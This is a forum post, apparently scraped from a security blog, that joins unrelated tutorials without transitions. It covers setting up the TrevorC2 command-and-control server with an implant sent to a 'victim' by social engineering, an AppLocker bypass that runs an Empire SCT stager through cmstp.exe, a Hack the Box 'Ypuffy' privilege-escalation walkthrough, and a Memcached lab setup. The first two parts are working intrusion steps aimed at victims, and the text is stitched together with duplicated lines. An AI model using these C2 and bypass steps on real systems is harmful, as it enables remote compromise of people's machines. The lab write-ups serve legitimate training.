05-14-2020, 11:26 AM
| 0 | 0 | ||
You can download it from
git clone
[To see content please register here]
1
git clone
[To see content please register here]
![[Image: 1.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-VnTzCkG_PeA/XGkMQdO3YbI/AAAAAAAAcso/-Wfk1elRCQYbQ2VB0Y_XamJvP9H4Np2BwCLcBGAs/s1600/1.png?w=687)
Once it’s downloaded, open the folder and then open the trevorc2_server.py file and change the IP to your localhost IP as shown in the image below. Also, provide the site that will be cloned to the trevorc2 server.
![[Image: 2.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-jWY_rmu-S-w/XGkMQa1LC3I/AAAAAAAAcsw/pCD8m992acMxIuBpwxt8Qi3FxV3jvmhuwCLcBGAs/s1600/2.png?w=687)
Then, start and run the trevorc2 framework.
![[Image: 3.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-s-288l82WyU/XGkMQWSLpMI/AAAAAAAAcss/9MGsELbvh70KhCWoi7nt8Z_zI51x9MyqACLcBGAs/s1600/3.png?w=687)
Once the trevorc2 is up and running, change the IP to your localhost IP in trevorc2.ps1 file.
![[Image: 4.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-gn78Yc9Vno0/XGkMQzT8zOI/AAAAAAAAcs0/QdeBZFRO_zk_YmXnkJo6ztLjr8ylgOntACLcBGAs/s1600/4.png?w=687)
Then send this file to the victim using any desired social engineering method. Once the file is executed by the victim, you will have your session as shown in the image below :
To see the sessions type :
list
1
list
And to access this session type :
interact <serial number od session>
1
interact <serial number od session>
![[Image: 5.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-sH4rLHZG3Ts/XGkMRPAMxxI/AAAAAAAAcs4/x9crGa9zFG8opsiNYpJ08_2b-Q909zJQgCLcBGAs/s1600/5.png?w=687)
By default, Applocker allows the executing of binaries in the folder that is the major reason that it can be bypassed. It has been found that such binaries can easily be used in order to bypass Applocker along with UAC. One of such binary related to Microsoft is CMSTP. CMSTP welcomes INF files and so exploitation through INF is possible. And so, we will be learning how to perform such exploitation.
Non-framework procedures like cmstp.exe start from programming you introduced on your system. Since most applications store information on your hard drive and in your system’s registry. It has machine code written in it. In the event that you begin the product Microsoft® Connection Manager on your system, the directions contained in cmstp.exe will run on your system. For this reason, the record is stacked into the primary memory (RAM) and keeps running there as a Microsoft Connection Manager Profile Installer process (additionally called an errand). As we all know CMSTP accepts SCT files and runs then without suspicion and therefore we will create a malicious SCT file to reach our goal. We will use Empire PowerShell for this. For a detailed guide on Empire PowerShell click
[To see content please register here]
.Launch the empire framework from the terminal of Kali and then type the following commands to create your malware :
listeners
uselistener http
set Host 192.168.1.109
execute
1
2
3
4
listeners
uselistener http
set Host 192.168.1.109
execute
![[Image: 1.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-SPvGtOOjM8M/XGg_Q0z3g_I/AAAAAAAAcsQ/OnJM44dmhcUwxsiw1cXJiuvfu-wsjSI-wCLcBGAs/s1600/1.png?w=687)
Above commands will create a listener for you, then type back to return from listener interface and as for the creation of SCT file type :
usestager windows/launcher_sct
set Listener HTTP
execute
1
2
3
usestager windows/launcher_sct
set Listener HTTP
execute
Running the above exploit will create your SCT file. We will use the following script to execute our file in PowerShell. In this script give the path of your SCT file and add the following line as shown in the image.
Download this script from
[To see content please register here]
:![[Image: 2.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-sT41kSgI1iw/XGg_QrtKTkI/AAAAAAAAcsM/t3U4bWlhLXkt0EDGXkQQp9Qp5J6AtUJ_ACLcBGAs/s1600/2.png?w=687)
Now, send the file to the victim’s PC and run the following command in victims’ command prompt :
cmstp.exe /s shell.inf
1
cmstp.exe /s shell.inf
![[Image: 3.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-KAli1G3fFO0/XGg_QpAAhcI/AAAAAAAAcsI/HTvA_QP4w0MNPotmXGNFZYFQMn19GYgXwCLcBGAs/s1600/3.png?w=687)
As soon as you run the command, you will have a session. Use the following command to access your session :
interact <session name>
1
interact <session name>
This way, you can use CMSTP binary to bypass applocker restrictions. CMSTP needs an INF file and by using it to your advantage you can have access to victim’s PC.
![[Image: 5.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-MIYrhUQ92bI/XGg_Rh6_RKI/AAAAAAAAcsU/QD8ZHO33MoMKGI8YCEBX2HWZsBYb8soDwCLcBGAs/s1600/5.png?w=687)
Today we are going to solve another CTF challenge “Ypuffy”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.
Level: Intermediate
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of Ypuffy is 10.10.10.107
Penetrating Methodology
- Network scanning (Nmap)
- Scanning port 389 using LDAP script
- Fetching shared directory using smbclient and finding the private key
- Connecting to VM with SSH using the private key
- Enumerating files with SUID bit set
- Discovering that alice1978 can run ssh-keygen as userca
- Discovering authorized commands at ssh login
- Fetching principal using the curl command
- Enumerating public certificate in system
- Signing RSA key with ca certificate using doas command and previously found the principal
- Logging into ssh using new private key pair
- Snagging the flag
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -sV -sC 10.10.10.107
1
nmap -sV -sC 10.10.10.107
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-qp5SqvzmNlQ/XGfPttr-dEI/AAAAAAAAcoo/ufQuVmRDzyQ944h_g3tG7N4Gvcm1hUC6wCLcBGAs/s1600/1.png?w=687&ssl=1)
The nmap scan shows us that there are 5 ports open: 22(SSH), 80(HTTP), 139(SMB), 389(LDAP), 445(SMB)
As LDAP service is running on port 389, we use nmap script called “ldap-search” to enumerate the target machine and we find the password hash for user “alice1978”.
nmap -p389 --script=ldap-search 10.10.10.107
1
nmap -p389 --script=ldap-search 10.10.10.107
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-tx5auBokK7s/XGfPtIhMHQI/AAAAAAAAcok/6KPE20CB5qMeMM8O_J4-6Oo-msmuQBhXgCLcBGAs/s1600/2.png?w=687&ssl=1)
Now as we find the password hash and username, we can login through using SMB using smbclient.
First, we check the shared directory available on the target machine and find a directory called “alice”. We then access the shared directory and find a file called “my_private_key.ppk”, we download the file to our local system.
smbclient –L \\\\10.10.10.107\\ -U alice1978%<hash> --pw-nt-hash
smbclient \\\\10.10.10.107\\alice -U alice1978%<hash> --pw-nt-hash
1
2
smbclient –L \\\\10.10.10.107\\ -U alice1978%<hash> --pw-nt-hash
smbclient \\\\10.10.10.107\\alice -U alice1978%<hash> --pw-nt-hash
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-Mu1I2izjicc/XGfPtwYOurI/AAAAAAAAcos/-GLim0ZyFZEk6t8HBdV6OoI0rfKnzvKmQCLcBGAs/s1600/3.png?w=687&ssl=1)
The file we downloaded was a “Putty Private Key” file, so we use puttygen to convert the file into RSA private key. After converting it into RSA key, we change the permission of the RSA key and use it to login through SSH.
puttygen my_private_key.ppk -O private-openssh -o id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]
1
2
3
puttygen my_private_key.ppk -O private-openssh -o id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected]
After logging in through SSH, we find a file called “user.txt”. We take a look at the contents of the file and find the first flag.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-ffc6I38x0hQ/XGfPt3yb7-I/AAAAAAAAcow/e8tfrQgIHWEeoFNmN6ik7jrhimIBgJwFwCLcBGAs/s1600/4.png?w=687&ssl=1)
Now we check the files with suid bit enabled and find that “doas” is available on the target machine. It is a command utility similar to the “sudo” command. Now we check “/etc/doas.conf” to find what commands we can run. We find that we can run “/usr/bin/ssh-keygen” as user “userca”.
find / -perm -4000 2>/dev/null
cat /etc/doas.conf
1
2
find / -perm -4000 2>/dev/null
cat /etc/doas.conf
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-HRLz5zBJ7cs/XGfPuZ4m0qI/AAAAAAAAco0/smsh08KK20Y7kaIy1M_mmS92ipnERsUkgCLcBGAs/s1600/5.png?w=687&ssl=1)
To further enumerate the target machine, we open the ssh configuration file at “/etc/ssh/sshd_config” and find we can run the command “/usr/bin/curl
[To see content please register here]
” and “/usr/bin/curl[To see content please register here]
”.![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-UxEykZAsNzI/XGfPuhlvx1I/AAAAAAAAco4/2KhRHXmYK3MwTxVViCLNDq5KXH79hsU2gCLcBGAs/s1600/6.png?w=687&ssl=1)
Further enumerating the web application, we find that we can request keys from “http://127.0.0.1/sshauth?type=key&username=%u” and principals from “http://127.0.0.1/sshauth?type=principals&username=%u”, we requested keys for root user and get no response but we are successfully able to get root user’s principal.
curl "http://127.0.0.1/sshauth?type=key&username=root"
curl "http://127.0.0.1/sshauth?type=principals&username=root"
1
2
curl "http://127.0.0.1/sshauth?type=key&username=root"
curl "http://127.0.0.1/sshauth?type=principals&username=root"
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-j_b1AvcNZhA/XGfPuzcl--I/AAAAAAAAco8/yprhDGEzEhMZuA8aawHeZj-De-nLGXRKwCLcBGAs/s1600/7.png?w=687&ssl=1)
As we have the root user’s principal, we can generate SSH keys and sign them with root’s principal. Doing so will allow us to login through SSH as root. Now we know we can run ssh-keygen to generate SSH keys but first, we need a certificate to sign the SSH key. We enumerate the machine to find a certificate and find one inside /home/userca directory.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-UXEr3TMa2o4/XGfPuyz32xI/AAAAAAAAcpA/hX5Why6JU6wKLCU_9lc85-HLfZSp5oFzgCLcBGAs/s1600/8.png?w=687&ssl=1)
First, we generate SSH keys and move them into the /tmp directory. Then we sign the keys as userca to read the certificate inside /home/userca/ca.
ssh-keygen
mv .ssh/id_rsa* /tmp/
doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I root /tmp/id_rsa.pub
1
2
3
ssh-keygen
mv .ssh/id_rsa* /tmp/
doas -u userca /usr/bin/ssh-keygen -s /home/userca/ca -n 3m3rgencyB4ckd00r -I root /tmp/id_rsa.pub
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-aKPMDPHhi_0/XGfPvOQ7AZI/AAAAAAAAcpE/pjhSuaNK8m0qRMzo8z3oAA8soTd8VeiIACLcBGAs/s1600/9.png?w=687&ssl=1)
After signing the RSA keys, we use the RSA key to login through SSH as the root user. After logging in we find a file called “root.txt”. We take a look inside the content of the file and find the final flag.
ssh -i /tmp/id_rsa root@localhost
1
ssh -i /tmp/id_rsa root@localhost
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-_qIKG6iKVKk/XGfPtD7F10I/AAAAAAAAcog/sDdNpWt_tCM86RyNrBgX08KRrRHBr_ykQCLcBGAs/s1600/10.png?w=687&ssl=1)
In this article, we are going to learn about pen-testing in Memcached lab setup in Ubuntu 18.04. Memcached server is used by corporations in order to increase the speed of their network as it helps to store frequently used data. This helps to take the load of the hardware and decrease the time taken.
Table of Contents
- Introduction to Memcached.
- Memcached Installation.
- Memcached Configuration.
Memcached is a distributed memory object caching system. It’s an open source and without any cost tool. It is used to speed up web applications by using a database from the cache memory. It is an in-memory key-value store for little bits of self-assertive information (strings, objects) that is extracted from database calls, API calls, or page rendering. Memcached is basic however capable of advancing speed arrangement, ease of advancement, and understands numerous issues confronting expansive information caches. Its API is accessible for most prevalent languages.
Memcached Installation
To install, boot up your Ubuntu machine and open the terminal.
Note: Apache2 should be installed before installing Memcached. You can easily install Apache2 by just typing in a simple command.
apt install apache2
1
apt install apache2
Now that we are all done, let’s setup Memcached by typing the commands shown below.
apt install memcached
1
apt install memcached
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-oJZ1Rz8gEP0/XGeiPxEJAfI/AAAAAAAAcnU/ElUpG22212g1TVuXRxAoJP4x1syHGlDyQCLcBGAs/s1600/1.png?w=687&ssl=1)
After installing Memcached add ppa:ondrej/php PPA in your Ubuntu system’s repository to
download and install the latest version of PHP available. Follow the commands as shown below.
add-apt-repository ppa:ondrej/php
1
add-apt-repository ppa:ondrej/php
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-k7Uyox7UPyQ/XGeiRSdWrBI/AAAAAAAAcno/y1sjDzWrobIzcwby39SAxHoynDMYLzFCQCLcBGAs/s1600/4.png?w=687&ssl=1)
After adding the repository, update the system by typing in the following command.
apt update
1
apt update
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-6KLghX3GZIg/XGeiReOg1pI/AAAAAAAAcnk/QSruewGstnwdhuA3G_Zo8NPyW9XF3cenwCLcBGAs/s1600/5.png?w=687&ssl=1)
Now, install PHP by executing the command shown below :
apt install –y php php-dev php-pear libapache2-mod-php
1
apt install –y php php-dev php-pear libapache2-mod-php
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-KFR47U7YJkw/XGeiR6swVII/AAAAAAAAcns/aJWtq-SbOuQVCSNhc7DdsKkxA0zew0YfACLcBGAs/s1600/6.png?w=687&ssl=1)
Now that PHP has been installed successfully in our system, we will go ahead and install the PHP Memcached module by executing the below command:
apt install -y php-memcached
1
apt install -y php-memcached
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-Zt64xvdVc9c/XGeiR_y9eDI/AAAAAAAAcnw/YfWZ-I1zlyUXn1_-uAVro0HtwK0zqJn4wCLcBGAs/s1600/7.png?w=687&ssl=1)
Once the installation is complete, restart the Apache2 service.
service apache2 restart
1
service apache2 restart
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-EVwHehFW7Gw/XGeiSCosQCI/AAAAAAAAcn0/Ot1kSKI-mVwEP4b8CUYf3Oye948ynvlsgCLcBGAs/s1600/8.png?w=687&ssl=1){kind=small}
Now check whether the PHP extension is working fine or not by creating an info.php by using the code mentioned below with nano or any text editor you like.
<?php
phpinfo();
?>
1
2
3
<?php
phpinfo();
?>
![[Image: 9.1.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-198gkbQv788/XGeiSieX2rI/AAAAAAAAcn4/uH1TLQfJgg0z4tefxe95En0115BX6c6UgCLcBGAs/s1600/9.1.png?w=687&ssl=1)
Now save the file in /var/www/html
Once the file is saved, access it from your web browser by typing in the following URL.
localhost/info.php
1
localhost/info.php
You should see the results as shown in the image below.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-TeLM2Dpy23w/XGeiSgH8VgI/AAAAAAAAcn8/doJk9Is1iPgZIkzgHLRU6HM-b_ASTPDHACLcBGAs/s1600/9.png?w=687&ssl=1)
Memcached Configuration
Now, here we are going to configure the Memcached Server. To do so, we have to edit its configuration file. You will find this configuration file through /etc/memcached.conf path. Open the memcached.conf file using nano or any other text editor. The commands that are shown below will be given and activated by default. The purpose of this mentioning is to let you know that where you can find it; along with why and how to make changes to it., if necessary. Following are the said commands which are important for low-level Memcached Server configuration:
-m 64
Here,
–m: specifies the maximum memory limit which is used by Memcached daemon. By default, this limit is 64 MB
-p 11211
Here,
–p: specifies the port number. By default, it’s 11211.
-u memcache
Here,
–u starts the daemon tool as root.
After this, uncomment “-l 127.0.0.1” by simply adding # as shown in the image, as it will not be so by default. By uncommenting, it will stop binding the IP address of Memcached listener to the loopback IP. Hence, traffic can come from any IP over the internet.
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-g_hv6CgEXzA/XGeiPxW4l7I/AAAAAAAAcnY/W5ApcFk4z5gycJpYF4AzkxFtXd7kef8BgCLcBGAs/s1600/10.png?w=687&ssl=1)
Now once you saved the configuration file after making the changes, restart the service by using the following command :
service memcached restart
1
service memcached restart
Then use the following command to confirm whether Memcached configurations are working are not :
ss -tnl
1
ss -tnl
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-EsykCCZJ65M/XGeiP0xLzkI/AAAAAAAAcnQ/3d9CHuqBueI5qAQo-OiDCNjDjAEVe8pWQCLcBGAs/s1600/11.png?w=687&ssl=1)
Once you are done with the above commands, connect Memcached through telnet and do a version check by typing in “version” command:
telnet localhost 11211
version
1
2
telnet localhost 11211
version
![[Image: 12.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-SRTCEHsrbNo/XGeiQleGyaI/AAAAAAAAcnc/FD4NYATeddECNhyA7m_YsC66BdDVPwAowCLcBGAs/s1600/12.png?w=687&ssl=1)
Now, you can use nmap to check if the Memcached service is running on the server.
nmap -sV -p- 192.168.1.32
1
nmap -sV -p- 192.168.1.32
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-VzFjT7rPMus/XGeiQ23_yqI/AAAAAAAAcng/BDKELLAT2k03JqqryVu-Q0jviatpFhcyACLcBGAs/s1600/13.png?w=687&ssl=1)
Conclusion
To conclude, we can say that Memcached is a distributed memory caching system. It uses expiration timeouts i.e. if the server has no memory left, it will evict items to replace them with the new ones. The items it chooses to replace are the ones which have not been requested for a long period of time. And so, in the above article, we have provided a basic guide to set up the Memcached penetration testing lab.
